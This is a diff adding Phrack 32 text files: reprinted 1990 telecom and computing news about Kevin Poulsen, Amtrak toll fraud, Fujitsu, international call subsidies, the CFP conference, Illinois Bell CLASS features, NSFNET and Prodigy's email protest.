+happy to turn in a high-ranking hacker, thereby pushing themselves up the
+status ladder, he said.  But Poulsen probably has access to a steady flow of
+cash, so he doesn't have to get a job that might lead to his arrest, Maxfield
+said.
+
+     With his expertise, Poulsen could easily crack the bank computers that
+validate cash transactions and then credit his own accounts, Maxfield said.
+The FBI isn't desperate, but agents have contacted America's Most Wanted, a
+television show that asks viewers to help authorities find fugitives.
+
+     Poulsen's mother, Bernadine, said her son called home just after police
+announced there was a warrant for his arrest, but he had not called since.
+During the brief call, "He just apologized for all the stress he was causing
+us." The fugitive's motivation baffles Maxfield.
+
+     The self-described "hacker tracker" has conducted investigations that have
+led to dozens of arrests, but the Poulsen-contrived conspiracy as alleged by
+the FBI is strange, he said.  Most teen-age hackers are thrill seekers, he
+explained.  The more dangerous the scam, the bigger the high.  But Poulsen is
+24.  "Why is he still doing it?" Maxfield asked.
+
+     Poulsen, alias "Dark Dante" and "Master of Impact," was a member of an
+elite hacker gang called Legion of Doom.  [Poulsen was never a member of the
+group -DH]
+
+The 25 or so mischievous members are now being arrested one by one, Maxfield
+said.  They consider themselves misfits, but smart misfits who are superior to
+the masses of average people who have so labelled them, he said.  [Baha,
+Maxfield really cracks me up  -DH]
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+     Kevin recently had a 15 minute television debut on NBC's "Unsolved
+Mystries".  The program showed renactments of Kevin breaking into CO's and
+walking around his apartment filled with computers and other 'listening'
+devices (as the show called them).
+
+     I personally got a kick out of the photographs he took of himself holding
+switching equipment after a break-in at a CO.
+_______________________________________________________________________________
+
+HEADLINE  Amtrak Gets Aboard SDN
+          Byline:   BETH SCHULTZ
+DATE      10/25/90
+SOURCE    COMMUNICATIONS WEEK
+          Issue:    267
+          Section:  PN
+          Page:     58
+          (Copyright 1989 CMP Publications, Inc.  All rights reserved.)
+
+WASHINGTON - Amtrak, always looking for ways to reduce the amount of government
+funding it takes to keep it on track, has switched its long distance traffic
+onto a virtual private network-taking advantage of an AT&T promotion that saved
+the railroad $250,000.  Though Amtrak realized the cost-savings potential of
+AT&T's Software Defined Network (SDN) as early as May 1987, it took until last
+spring for the company to move full-speed ahead with implementation of that
+virtual private network service.  "We had led the horse to water, but we
+couldn't make it drink," said Jim West, an AT&T national systems consultant.
+
+     But in April of this year, AT&T removed the last obstacle in the
+railroad's way, said Amtrak's chief network engineer Matt Brunk.  At that time,
+AT&T began running a special promotion that waived the installation fee for
+connecting sites to the SDN.  Until then, Amtrak, based here, could only afford
+adding locations piecemeal.
+
+     Plagued by network abuse, Amtrak began tracking the potential of SDN as a
+means of solving that problem as soon as AT&T announced its SDN rates in
+December 1986.  Describing the severity of its toll-fraud problem, Brunk told
+of a seven-day stint in 1985 during which hackers tallied $185,000 in
+unauthorized charges.  By the end of that year, toll fraud on Amtrak's network
+reached in excess of $1 million.
+
+     Before the days of the virtual private network, the only way to clean up
+this abuse was through a toll-free "800" service configuration and PBX remote
+access, which Amtrak implemented at the end of 1985.  "We changed the policy
+and procedures for all users, limiting the capabilities of remotaccess," Brunk
+said.
+
+     But Amtrak needed to further patrol its network, and after studying AT&T's
+SDN, as well as competitive offerings, the railroad ordered in May 1987 the
+first portion of what would this year become a 300-site SDN.  The initial order
+included AT&T Accunet T1.5 circuits for just two stations, one in Chicago and
+one here.  Used to replace the 800 service, these 1.544-megabit-per-second
+direct connections were used to "provide secure remote access to on-net numbers
+for numerous users," Brunk said.
+
+     Equally important, Amtrak also signed up for the Network Remote Access
+Fraud Control feature, which gives it a single point of control over the
+network.  "What Amtrak ordered then was not really a network, because it was
+feature-specific," said AT&T national account manager Sharon Juergens.
+
+     The company has not billed back or dropped any toll fraud since it began
+using the SDN remote access feature, Brunk said.  "Anyone with PBX
+remote-access capability and :heavy!  volume not using SDN as a vehicle is
+doing their company a disservice."
+
+     Originally a beta-test site for the SDN's security-report feature, Amtrak
+has since come to rely heavily on that option, too.  With the exception of some
+group codes, a warning is sent if spending on any user code exceeds $60 per
+month.  "We begin investigating immediately," Brunk said.  "We are now
+proactive, instead of reactive."
+
+     Today, 40 Amtrak locations have switched-access connections to the SDN;
+260 sites are linked through dedicated means, whether through voice-grade
+analog circuits or high-speed T1s.  "The users' traffic is discounted, on a
+single billing statement, and in effect, :the SDN!  links them to the company.
+This is our corporate communications glue," Brunk said.  "But this is only the
+beginning.  Not only have we provided a service, but also we have provided a
+bright future.  We have set ourselves up for competitive gain." Spending
+Stabilized And the company has stabilized telecommunications expenditures.  In
+1985, Amtrak spent $26 million on telecom equipment and services.  Four years
+later, Brunk estimated the railroad will spend just $1 million more.  He said
+contributing factors to this will be the SDN, upgrading from outdated analog
+PBXs to digital PBXs and replacing some PBX installations with local
+Bell-provided centrex service.  Network savings resulting from reduced
+call-setup time alone, Brunk added, will reach $74,000 this year.
+
+     "In a nutshell, we have improved transmission quality, network management
+and maintenance, and reduced costs," Brunk said.  "The users have gained a
+single authorization code accessing multiple applications, improved quality and
+support."
+
+     Cost savings aside, Amtrak also took into consideration applications
+available off the SDN.  "At the time, of what was available, we really liked
+everything about SDN," Brunk said.
+
+     The Amtrak network is supported by the dedicated access trunk testing
+system.  This system lets Amtrak test access lines, thus aiding the company in
+activating and deactivating authorization codes.  And Amtrak is testing the
+AT&T Alliance dedicated teleconferencing service.
+
+     With the teleconferencing service, Amtrak can reduce internal travel
+expenditures:  Users can access the system remotely via an 800 number, or on
+demand.  Amtrak operators can connect teleconferencing calls at any time.  "The
+quality is fantastic, but the cost is even better because it's all connected to
+the SDN," said Brunk.
+
+_______________________________________________________________________________
diff --git a/phrack32/11.txt b/phrack32/11.txt
new file mode 100644
index 0000000..7b064a8
--- /dev/null
+++ b/phrack32/11.txt
@@ -0,0 +1,1355 @@
+                        KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
+
+                              K N I G H T L I N E
+
+                            Issue 01/Part II of III
+
+                            17th of November, 1990
+
+                              Written, compiled,
+
+                           and edited by Doc Holiday
+
+                        KL ^*^ KL ^*^ KL ^*^ KL ^*^ KL
+
+                                      ---
+                           F R O M   T H E   W I R E
+_______________________________________________________________________________
+
+HEADLINE  ADAPTING DIGITAL SWITCH -- Fujitsu To Expand In U.S.
+          Byline:   ROBERT POE
+DATE      11/15/90
+SOURCE    COMMUNICATIONSWEEK   (CWK)
+          Issue:    322
+          Section:  PUBLIC NETWORKING
+          Page:     33
+          (Copyright 1990 CMP Publications, Inc.  All rights reserved.)
+
+RALEIGH, N.C.-Fujitsu Ltd.  is boosting efforts to adapt its digital exchange
+to the U.S.  network, in anticipation of the $40 billion public switch
+changeout expected in the United States over the next 10 to 15 years.
+
+Fujitsu plans to increase the number of U.S.  staff members in charge of
+selling and engineering the Fetex-150 switch to 600 by 1994 from the current
+100, officials at the Tokyo-based company said.
+
+The increase will shift development of sophisticated switch features from Japan
+to the United States, said one observer familiar with Fujitsu Network Switching
+of America Inc., based here.
+
+FILLING U.S. NEEDS
+
+Most of the current staff there is working on testing the performance and
+network conformance of software developed in Japan, the observer said.  With
+the expansion, the subsidiary will be responsible for developing functions and
+capabilities required by U.S.  customers.
+
+The Fetex-150 is Fujitsu's export-model exchange switch, with more than 8.8
+million lines installed or on order in 17 countries.  None have been sold in
+the United States, but the recently announced plans confirm longstanding
+speculation that the Japanese manufacturer is planning a major push into the
+U.S.
+
+When Fujitsu won a major switch tender in Singapore last autumn, competitors
+complained it was selling the equipment at cost to win a prestigious contract
+that would serve as a stepping-stone to the United States.
+
+WOOING THE BELLS
+
+Fujitsu said its switch has passed Phase 1 and Phase 2 evaluations by Bell
+Communications Research Inc., Livingston, N.J., the research arm of the seven
+U.S.  regional Bell companies.  Although the Bellcore certification is
+considered essential to selling to the Bells-which account for about 75 percent
+of U.S.  telephone lines-it may not be enough for the company to break into a
+market dominated by AT&T and Nashville, Tenn.-based Northern Telecom Inc.
+
+Those two manufacturers have more than 90 percent of the U.S.  market.  A share
+like that, coupled with Bell company inertia in changing to new suppliers,
+leaves foreign public switch manufacturers largely out in the cold, analysts
+said.
+
+The U.S.  subsidiaries of Siemens AG, L.M.  Ericsson Telephone Co., NEC Corp.
+and GEC Plessey Telecommunications Ltd.  have found the U.S.  market tough to
+crack, though each has had limited success and is further along than Fujitsu.
+
+`INHERENT CONSERVATISM'
+
+"There's an inherent conservatism on the part of their {U.S.} customer base,"
+said Robert Rosenberg, director of analytical services at The Eastern
+Management Group, Parsippany, N.J.  "These are huge companies with billions of
+dollars invested in their current equipment.
+
+"Even if Fujitsu comes up with a switch that has all the bells and whistles
+that an engineer could ever want, if all the support systems have to be rebuilt
+in order to fit that switch into the network, his manager won't let him install
+it," Rosenberg said.
+
+
+
+_______________________________________________________________________________
+
+
+Telephone Services:  A Growing Form Of "Foreign Aid"
+
+Keith Bradsher, {The New York Times}, Sunday, October 21, 1990
+                (Business section, page 5)
+
+ Americans who make international telephone calls are paying extra to
+subsidize foreign countries' postal rates, local phone service, even
+schools and armies.
+
+ These subsidies are included in quarterly payments that American
+telephone companies must make to their counterparts overseas, most of
+these are state-owned monopolies.  The net payments, totaling $2.4
+billion last year, form one of the fastest-growing pieces of the
+American trade deficit, and prompted the Federal communications
+Commission this summer to begin an effort that could push down the
+price that consumers pay for an international phone call by up to 50
+percent within three years.
+
+ The imbalance is a largely unforeseen side effect of the growth of
+competition in the American long-distance industry during the 1980's.
+The competition drove down outbound rates from the United States,
+while overseas monopolies kept their rates high.
+
+ The result is that business and families spread among countries try
+to make sure that calls originate in the United States.  Outbound
+calls from the United States now outnumber inbound calls by 1.7-to-1,
+in minutes -- meaning American phone companies have to pay fees for
+the surplus calls.  The F.C.C. is concerned that foreign companies are
+demanding much more money than is justified, given the steeply falling
+costs of providing service, and proposes to limit unilaterally the
+payments American carriers make.
+
+ Central and South American countries filed formal protests against
+the F.C.C.'s plan on October 12.  Although developed countries like
+Britain and Japan account for more than half of United States
+international telephone traffic, some of the largest imbalances in
+traffic are with developing countries, which spend the foreign
+exchange on everything from school systems to weapons.  The deficit
+with Columbia, for example, soared to $71 million last year.
+
+ International charges are based on formulas assigning per-minute
+costs of receiving and overseas call and routing it within the home
+country.  But while actual costs have dropped in recent years, the
+formulas have been very slow to adjust, if they are adjusted at all.
+For example, while few international calls require operators, the
+formulas are still based on such expenses.
+
+ Furthermore, the investment required for each telephone line in an
+undersea cable or aboard a satellite has plummeted with technological
+advances.  A trans-Pacific cable with 600,000 lines, announced last
+Wednesday and scheduled to go into service in 1996, could cost less
+than $1,000 per line.
+
+ Yet the phone company formulas keep charges high.  Germany's Deutsche
+Bundespost, for example, currently collects 87 cents a minute from
+American carriers, which actually lose money on some of the off-peak
+rates they offer American consumers.
+
+MORE CALLS FROM THE U.S. ARE GENERATING A GROWING TRADE DEFICIT
+
+U.S. telephone companies charge less for      1980   0.3   (billions of
+overseas calls than foreign companies         1981   0.5    U.S. dollars)
+charge for calls the United States.  So       1982   0.7
+more international calls originate in the     1983   1.0
+United States.  But the U.S. companies pay    1984   1.2
+high fees to their foreign counterparts for   1985   1.1
+handling those extra calls, and the deficit   1986   1.4
+has ballooned in the last decade.             1987   1.7
+                                              1988   2.0
+                                              1989   2.4 (estimate)
+(Source: F.C.C.)
+
+THE LONG DISTANCE USAGE IMBALANCE
+
+Outgoing and incoming U.S. telephone traffic, in 1988, the latest year
+for which figures are available, in percent.
+
+Whom are we calling?              Who's calling us?
+Total outgoing traffic:           Total incoming traffic:
+5,325 million minutes             3,155 million minutes
+
+  Other:      47.9%                  Other:      32.9%
+  Canada:     20.2%                  Canada:     35.2%
+  Britain:     9.1%                  Britain:    12.6%
+  Mexico:      8.8%                  Mexico:      6.2%
+  W. Germany:  6.9%                  W. Germany:  5.4%
+  Japan:       4.4%                  Japan:       4.3%
+  France:      2.7%                  France:      3.4%
+
+(Source:  International Institute of Communications)
+
+COMPARING COSTS:  Price range of five-minute international calls between
+the U.S. and other nations.  Figures do not include volume discounts.
+
+Country            From U.S.*          To U.S.
+
+Britain            $2.95 to $5.20      $4.63 to $6.58
+Canada (NYC to     $0.90 to $2.25      $1.35 to $2.26
+  Montreal)
+France             $3.10 to $5.95      $4.72 to $7.73
+Japan              $4.00 to $8.01      $4.67 to $8.34
+Mexico (NYC to     $4.50 to $7.41      $4.24 to $6.36
+  Mexico City)
+West Germany       $3.10 to $6.13      $10.22
+
+* For lowest rates, callers pay a monthly $3 fee.
+(Source: A.T.&T.)
+
+WHERE THE DEFICIT FALLS: Leading nations with which the United States
+has a trade deficit in telephone services, in 1989, in millions of
+dollars.
+
+Mexico:               $534
+W. Germany:            167
+Philippines:           115
+South Korea:           112
+Japan:                  79
+Dominican Republic:     75
+Columbia:               71
+Italy:                  70       (Source: F.C.C.)
+Israel:                 57
+Britain:                46
+
+THE RUSH TOWARD LOWER COSTS: The cost per telephone line for laying
+each of the eight telephone cables that now span the Atlantic Ocean,
+from the one in 1956, which held 48 lines, to the planned 1992 cable
+which is expected to carry 80,000 lines.  In current dollars.
+
+1956       $557,000
+1959        436,000
+1963        289,000
+1965        365,000
+1970         49,000
+1976         25,000
+1983         23,000               (Source, F.C.C.)
+1988          9,000
+1992          5,400  (estimate)
+
+
+
+_______________________________________________________________________________
+
+A few notes from Jim Warren in regards to the CFP conference:
+
+
+Greetings,
+  Some key issues are now settled, with some minor remain for resolution.
+
+CONFERENCE DATES, LOCATION & MAXIMUM SIZE
+
+We have finally completed site selection and contracted for the Conference
+facility.  Please mark your calendars and spread the word:
+
+               First Conference on Computers, Freedom & Privacy
+                       March 25-28,1991, Monday-Thursday
+                     SFO Marriott, Burlingame, California
+              (just south of San Francisco International Airport;
+       on the San Francisco Peninsula, about 20 minutes from "The City")
+                            maximum attendance: 600
+
+PLEASE NOTE NAME CHANGE
+
+We have found *ample* issues for a very robust Conference, limited only to
+computer-related issues of responsible freedom and privacy.  After questions
+regarding satellite surveillance, genetic engineering, photo traffic radar,
+wireless phone bugs, etc., we decided to modify the Conference title for
+greater accuracy.  We have changed it from "Technology, Freedom & Privacy" to
+"Computers, Freedom & Privacy."
+
+ONE MORE NIT TO PICK
+
+Until recently, our draft title has included, "First International Conference".
+
+We most definitely are planning for international participation, especially
+expecting presentations from EEC and Canadian privacy and access agencies.
+These will soon have significant impacts on trans-border dataflow and inter-
+national business communications.
+
+However, we were just told that some agencies require multi-month clearance
+procedures for staff attending any event with "International" in its title.
+
+**Your input on this and the minor issue of whether to include "International"
+in our Conference title would be appreciated.**
+
+ATTRIBUTION (BLAME)
+
+We are building the first bridge connecting the major, highly diverse villages
+of our new electronic frontier.  Such construction involves some degree of
+exploration and learning.
+
+These title-changes are a result of that learning process.  Please attribute
+all responsibility for the fluctuating Conference title to me, personally.  I
+am the one who proposed the first title; I am the one who has changed it to
+enhance accuracy and avoid conflict.
+
+Of course, the title will be settled and finalized (with your kind assistance)
+before the Conference is formally announced and publicity statements issued --
+soon!
+
+Thanking you for your interest and continued assistance, I remain, Sincerely,
+
+                                                 --Jim Warren, CFP Conf Chair
+                                                        jwarren@well.ca.sf.us
+
+_______________________________________________________________________________
+
+[Reprented from TELECOM digest. --DH]
+
+
+                 FROM: Patrick Townson <telecom@eecs.nwu.edu>
+                    SUBJECT: Illinois Bell Shows Real CLASS
+
+     For several months now, Illinois Bell has been hawking CLASS.  Brochures
+in the mail with our bills and newspaper advertisements have told us about the
+wonderful new services soon to be offered.
+
+It was just a question, they said, of waiting until your central office had
+been converted.  The new features being offered are:
+
+ *66  Auto Call Back:  Call back the last number which called you. No
+                       need to know the number.
+
+ *69  Repeat Dial:     If the number you dialed was busy, punching
+                       this will keep trying the number for up to
+                       30 minutes, and advise you when it can connect.
+
+ *60  Call Screening   Enter:
+                       # plus number to be screened out plus #
+                       * plus number to be re-admitted  plus *
+                       # plus 01 plus # to add the number of the
+                         last call you received, whether or not
+                         you know the number.
+                       1 To play a list of the numbers being screened.
+                       0 For a helpful recording of options, etc.
+
+Distinctive Ringing    Up to ten numbers can be programmed in. When a
+                       call is received from one of these numbers, your
+                       phone will give a special ring to advise you.
+
+Multi-Ring Service     Two additional numbers can be associated with
+                       your number. When someone dials one of these
+                       two numbers, your phone will give a special ring.
+
+With both Distinctive Ringing and Multi-Ring Service, if you have Call Waiting,
+the Call Waiting tones will be different from the norm also, so that you can
+tell what is happening.  With Multi-Ring Service, you can have it programmed so
+the supplementary numbers associated with your main number are forwarded when
+it is forwarded, or do not observe forwarding, and 'ring through' despite what
+the main number is doing.
+
+Alternate Answer       Can be programmed so that after 3-7 rings,
+                       the unanswered call will be automatically sent
+                       to another line *WITHIN YOUR CENTRAL OFFICE*.
+
+                       If the number assigned as an alternate is
+                       itself busy or forwarded OUTSIDE YOUR OFFICE
+                       then Alternate Answer will not forward the
+                       call and continue to ring unanswered.
+
+Transfer on Busy/      This is just another name for 'hunt'. The
+        No Answer      difference is that hunt is free; Transfer on
+                       Busy/NA  costs a couple bucks per month. Like
+                       Alternate Answer, it must forward only to a
+                       number on the same switch. Unlike hunt, it
+                       will work on NA as well. Unlike Alternate
+                       Answer, it works on busy as well.
+
+Caller*ID will be available 'eventually' they say.
+
+Now my story begins:
+
+     From early this summer to the present, I've waited patiently for CLASS to
+be available in Chicago-Rogers Park.  Finally a date was announced:  October 15
+the above features would be available.  In mid-September, I spoke with a rep in
+the Irving-Kildare Business Office.  She assured me *all* the above features
+would be available on October 15.  My bill is cut on the 13th of each month,
+and knowing the nightmare of reading a bill which has had changes made in
+mid-month (page after page of pro-rata entries for credits on the old service,
+item by item; pro-rata entries for the new service going in, etc) it made sense
+to implement changes on the billing date, to keep the statement simple.
+
+     She couldn't write the order for the service to start October 13, since
+CLASS was not officially available until the fifteenth.  Well, okay, so its
+either wait until November 13 or go ahead and start in mid-month, worrying
+about reading the bill once it actually arrives.
+
+     I've been ambivilent about CLASS since it is not compatible with my
+present service 'Starline', but after much thought -- and since all
+installation and order-writing on Custom Calling features is free now through
+December 31!  -- I decided to try out the new stuff.
+
+     She took the order Wednesday afternoon and quoted 'sometime Thursday' for
+the work to be done.  In fact it was done -- or mostly done -- by mid-afternoon
+Thursday.  But I should have known better.  I should have remembered my
+experience with Starline three years ago, when it took a technician in the
+central office *one week* to get it all in and working correctly.  Still, I
+took IBT's word for it.
+
+     I got home about 5:30 PM Thursday.  *You know* I sat down right away at
+the phone to begin testing the new features!  :) The lines were to be equipped
+as follows:
+
+Line 1:  Call Waiting                Line 2:  Call Forwarding
+         Three Way Calling                    Speed Dial 8
+         Call Forwarding                      Busy Repeat Dialing *69
+         Speed Dial 8
+         Auto Call Back  *66         (second line used mostly by modem;
+         Busy Repeat Dialing *69      so Call Waiting undesirable)
+         Call Screening *60
+         Alternate Answer  (supposed to be programmed to Voice Mail;
+                            another CO; another area code U708e;
+                            even another telco UCentele).
+
+     Busy Repeat Dialing did not work on the second line (not installed) and
+Alternate Answer worked (but not as I understood it would) on the first line.
+Plus, I had forgotten how to add 'last call received' to the screening feature.
+
+     It is 5:45 ...  business office open another fifteen minutes ...  good!  I
+call 1-800-244-4444 which is IBT's idea of a new way to handle calls to the
+business office.  Everyone in the state of Illinois calls it, and the calls go
+wherever someone is free.  Before, we could call the business office in our
+neighborhood direct ...  no longer.
+
+     I call; I go on hold; I wait on hold five minutes.  Finally a rep comes on
+the line, a young fellow who probably Meant Well ...
+
+     After getting the preliminary information to look up my account, we begin
+our conversation:
+
+Me:  You see from the order the new features put on today?
+Him: Yes, which ones are you asking about?
+Me:  A couple questions. Explain how to add the last call received to
+     your call screening.
+Him: Call screening? Well, that's not available in your area yet. You
+     see, it will be a few months before we offer it.
+Me:  Wait a minute!  It was quoted to me two days ago, and it is on
+     the order you are reading now is it not?
+     UI read him the order number to confirm we had the same one.e
+
+Him: Yes, it is on here, but it won't work. No matter what was written
+     up. Really, I have to apologize for whoever would have taken your
+     order and written it there.
+
+Me:  Hold on, hold on!  It *is* installed, and it *is* working! I want
+     to know how to work it.
+
+Him: No it is not installed. The only features we can offer you at
+     at this time are Busy Redial and Auto Callback. Would you like me
+     to put in an order for those?
+
+Me:  Let's talk to the supervisor instead.
+
+Him: (in a huff) Gladly sir.
+
+Supervisor comes on line and repeats what was said by the rep: Call
+Screening is not available at this time in Chicago-Rogers Park.
+
+At this point I am furious ...
+
+Me:  Let me speak to the rep who took this order (I quoted her by
+     name.)
+
+Supervisor: I never heard of her. She might be in some other office.
+
+Me: (suspicious) Say, is this Irving-Kildare?
+
+Supervisor: No! Of course not! I am in Springfield, IL.
+
+Me: Suppose you give me the name of the manager at Irving-Kildare
+then, and I will call there tomorrow. (By now it was 6 PM; the
+supervisor was getting figity and nervous wanting to go home.)
+
+Supervisor: Here! Call this number tomorrow and ask for the manager of
+            that office, 1-800-244-4444.
+
+Me:  Baloney! Give me the manager's direct number!
+
+Supervisor: Well okay, 312-xxx-xxxx, and ask for Ms. XXXX.
+
+Me: (suspicious again) She is the manager there?
+
+Supervisor: Yes, she will get you straightened out. Goodbye!
+
+     Comes Friday morning, I am on the phone a few minutes before 9 AM, at the
+suggested direct number.  Ms.  XXXX reviewed the entire order and got the Busy
+Repeat Dial feature added to line two ...  but she insisted the original rep
+was 'wrong for telling you call screening was available ..' and the obligatory
+apology for 'one of my people who mislead you'.  I patiently explained to her
+also that in fact call screening was installed and was working.
+
+Manager:  Oh really? Are you sure?
+
+Me:  I am positive. Would you do me a favor? Call the foreman and have
+     him call me back.
+
+Manager: Well, someone will call you later.
+
+     Later that day, a rep called to say that yes indeed, I was correct.  It
+seems they had not been told call screening was now available in my office.  I
+told her that was odd, considering the rep who first took the order knew all
+about it.
+
+     I asked when the Alternate Answer 'would be fixed' (bear in mind I thought
+it would work outside the CO, which it would not, which is why it kept ringing
+through to me instead of forwarding.)
+
+She thought maybe the foreman could figure that out.
+
+     Maybe an hour later, a techician did call me to say he was rather
+surprised that call screening was working on my line.  He gave a complete and
+concise explanation of how Alternate Answer and Transfer on Busy/No Answer was
+to work.  He offered to have it removed from my line since it would be of no
+value to me as configured.
+
+     One question he could not answer:  How do you add the last call received
+to call screening?  He could find the answer nowhere, but said he would see to
+it I got 'the instruction booklet' in the mail soon, so maybe I could figure it
+out myself.
+
+     I got busy with other things, and put the question aside ...  until early
+Saturday morning when I got one of my periodic crank calls from the same number
+which has plagued me for a couple months now with ring, then hangup calls on an
+irregular basis.
+
+     For the fun of it, I punched *69, and told the sassy little girl who
+answered the phone to quit fooling around.  She was, to say the least,
+surprised and startled by my call back.  I don't think I will hear from her
+again.  :)
+
+     But I decided to ask again how to add such a number to call screening,
+so I called Repair Service.
+
+     The Repair Service clerk pulled me up on the tube *including the work
+order from two days earlier* and like everyone else said:
+
+Repair:  You don't have Call Screening on your line. That is not
+         available yet in your area. We are adding new offices daily,
+         blah, blah.
+
+     I *couldn't believe* what I was hearing ...  I told her I did, and she
+insisted I did not ...  despite the order, despite what the computer said.
+Finally it was on to her supervisor, but as it turned out, her supervisor was
+the foreman on duty for the weekend.  Like the others, he began with apologies
+for how I 'had been misinformed' ...  no call screening was available.
+
+Me:  Tell ya what. You say no, and I say yes. You're on the test
+     board, no?  I'll hang up. You go on my line, dial *60, listen to
+     the recording you hear, then call me back. I will wait here. Take
+     your time. When you call back, you can apologize.
+
+Foreman: Well, I'm not on the test board, I'm in my office on my own
+     phone.
+
+Me:  So go to the test board, or pick me up in there wherever it is
+     handy and use my line. Make a few calls. Add some numbers to the
+     call screening; then call me back with egg on your face, okay?
+
+Foreman: Are you saying call screening is on your line and you have
+     used it?
+
+Me:  I have used it.  Today. A few minutes ago I played with it.
+
+Foreman: I'll call you back.
+
+(Fifteen minutes later) ...
+
+
+Foreman:  Mr. Townson!  Umm ... I have been with this company for 23
+     years.  I'll get to the point: I have egg on my face. Not mine
+     really, but the company has the egg on the face. You are correct;
+     your line has call screening.
+
+Me:  23 years you say?  Are you a member of the Pioneers?
+
+Foreman: (surprised)  Why, uh, yes I am.
+
+Me:  Fine organization isn't it ...
+
+Foreman:  Yes, it certainly is.  You know of them?
+
+Me:  I've heard a few things.
+
+Foreman:  Look, let me tell you something. I did not know -- nor *did
+anyone in this office know* that call screening was now available. We
+were told it was coming, that's all.
+
+Me:  You mean no one knew it was already in place?
+
+Foreman:  No, apparently not ... I think you are the only customer in
+the Rogers Park office who has it at this time.  Because the
+assumption was it was not yet installed, the reps were told not to
+take orders for it ... I do not know how your order slipped through.
+
+Me:  Will you be telling others?
+
+Foreman: I have already made some calls, and yes, others will be told
+about this on Monday.
+
+Me:  Well, you know the *81 feature to turn call screening on and off
+is still not working.
+
+Foreman:  I'm not surprised. After all, none of it is supposed to be
+working right now.  You seem to know something about this business,
+Mr. Townson.
+
+Me: I guess I've picked up a few things along the way.
+
+     We then chatted about the Transfer on Busy/No Answer feature.  I asked
+why, if my cell phone on 312-415-xxxx had the ability to transfer calls out of
+the CO and be programmed/turned on and off from the phone itself, my wire line
+could not.  312-415 is out of Chicago-Congress ...  he thought it might have to
+do with that office having some different generics than Rogers Park ...  but he
+could not give a satisfactory answer.
+
+
+Patrick Townson
+
+
+
+_______________________________________________________________________________
+
+
+The following article appeared in the U-M Computing Center News
+(October 25, 1990, V 5, No 18, Pg 10)
+
+[This article was also reprinted in TELECOM digest -DH]
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+NSFNET DEMONSTRATES INTERCONTINENTAL ISO TRANSMISSION
+
+[Editor's note: The following article is reprinted, with modifications,
+ from the September 1990 issue of the Link Letter (Vol 3, No 4),
+published by the Merit/NSFNET backbone project]
+
+At the end of September, partners in the National Science Foundation Network
+(NSFNET) announced a succesful demonstration of intercontinental data
+transmission using the International Standards Organization Conectionless
+Network Protocol (ISO CLNP).  The international exchange of ISO CLNP packets
+was demonstrated betweeen end systems at the NSFNET Network Operations Center
+in Ann Arbor and in Bonn, West Germany, using the NSFNET backbone
+infrastructure and the European Academic Supercomputer Initiative (EASInet)
+backbone.
+
+The prototype OSI implementation is intended to provide wide area connectivity
+between OSI networks, including networks using the DECNet Phase V protocols.
+
+The new software was integrated into the NSFNET's "packet switching" (data
+transmission) nodes by David Katz and Susan Hares of the Merit Computer
+Network, with support from IBM's software developement departments in Milford,
+CT and Yorktown Heights, NY.
+
+NSFNET is the first federally supported computer network to acheive
+international ISO CLNP transmission on an operating network, according to
+Merit's Hans-Werner Braun, Principle Investigator for the NSFNET Project.
+
+The Prototype ISO implementation is being designed to coexist with NSFNET's
+operational Internet Protocol (IP) network, and is a significant step towards
+offering ISO services on the NSFNET backbone.  Eric Aupperle, President of
+Merit and acting director of ITD Network Systems, says that "the demonstration
+shows that we're capable of transporting ISO traffic.  Now we're working to
+deploy this experimental service as fast as possible."
+
+An implementation of CLNP was first demonstrated by Merit/NSFNET staff at the
+InterOp '89 conference.  That implementation of CLNP was originally developed
+as part of the ARGO project at the University of Wisconsin, Madision, with the
+support of the IBM Corporation.
+
+by Ken Horning
+DTD Network Systems.
+_______________________________________________________________________________
+
+
+{Middlesex News}, Framingham, Mass., 11/2/90
+
+Prodigy Pulls Plug on Electronic Mail Service For Some
+
+By Adam Gaffin
+
+NEWS STAFF WRITER
+
+Users of a national computer network vow to continue a protest against
+censorship and a new charge for electronic mail even though the company kicked
+them off-line this week.
+
+Brian Ek, spokesman for the network, Prodigy, said the "handful" of users had
+begun harassing other users and advertisers on the service and that some had
+even created programs "to flood members' 'mailboxes' with (thousands of)
+repeated and increasingly strident harangues," he said.
+
+But leaders of the protest say they sent only polite letters -- approved by the
+company's legal department -- using techniques taught by the company itself.
+Up to nine of them had their accounts pulled hips week.
+
+Protests began in September when the company said it would cut unlimited
+electronic mail from its monthly fee -- which includes such services as on-line
+airline reservations, weather and games -- and would charge 25 cents for every
+message above a monthly quota of 30.  Ek says the design of the Prodigy network
+makes "e-mail" very expensive and that few users send more than 30 messages a
+month.
+
+But Penny Hay, the only organizer of the "Cooperative Defense Committee" whose
+account was not shut this week, said she and others are upset with Prodigy's
+"bait and switch" tactics:  The company continues to promote "free" electronic
+mail as a major feature.  She said Prodigy itself had spurred use of e-mail by
+encouraging subscribers to set up private e-mail ``lists'' rather than use
+public forums and that the charges will especially hurt families, because the
+quota is per household, not person.
+
+Ek said relatively few members protested the rate chqange.  Gary Arlen, who
+publishes a newsletter about on-line services, called the controversy "a
+tempest in a teapot."
+
+Hay, however, said the group now has the backing of nearly 19,000 Prodigy users
+-- the ones advertisers would want to see on-line because they are the most
+active ones on the system and so more likely to see their ads.
+
+The group is also upset with the way the company screens messages meant for
+public conferences.  Other services allow users to see "postings"
+immediately.
+
+"They are infamous for this unpredicible and unfathomable censorship," Hay
+said.
+
+"We feel what we are doing is not censoring because what we are essentially
+doing is electronic publishing," Ek said, comparing the public messages to
+letters to the editor of a family newspaper.
+
+Neil Harris, marketing director at the competing GEnie service, said many
+people would feel intimidated knowing that what they write is being screened.
+He said GEnie only rarely has to deleted messages.  And he said GEnie has
+picked up several thousand new customers from among disgruntled Prodigy users.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+"Conversations with Fred," {Middlesex News}, Framingham, 11/6/90.
+
+The story is bizarre but true, swears Herb Rothman.  Seems Prodigy, the network
+run as a joint venture by Sears and IBM, wouldn't let somebody post a message
+in a coin-collecting forum that he was looking for a particular Roosevelt dime
+for his collection.  Upset, the man called "member services." The
+representative told him the message violated a Prodigy rule against mentioning
+another user in a public message.  "What user?" the man asked.  "Roosevelt
+Dime," the rep replied.  "That's not a person!" the man said.  "Yes he is,
+he's a halfback for the Chicago Bears," the rep shot back.
+
+Rothman is one of those alleged compu-terrorists Prodigy claims is harassing
+other users and companies that advertise on the service by sending out
+thousands upon thousands of increasingly hostile messages in protest of a
